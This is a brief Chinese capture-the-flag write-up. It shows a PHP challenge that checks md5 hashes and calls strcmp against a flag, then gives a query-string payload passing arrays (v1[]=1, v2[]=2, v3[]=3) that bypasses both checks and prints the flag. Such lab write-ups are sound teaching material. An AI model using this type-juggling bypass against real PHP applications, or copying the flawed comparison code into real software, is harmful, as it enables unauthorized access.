打开环境
查看源码
发现问题
访问
<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
$v1 = $_GET['v1'];$v2 = $_GET['v2'];$v3 = $_GET['v3'];if($v1 != $v2 && md5($v1) == md5($v2)){
if(!strcmp($v3, $flag)){
echo $flag;}}
}
?>
代码很简单直接绕过
payload:
?v1[]=1&&v2[]=2&&v3[]=3
得到flag
希望这篇文章能够帮助你!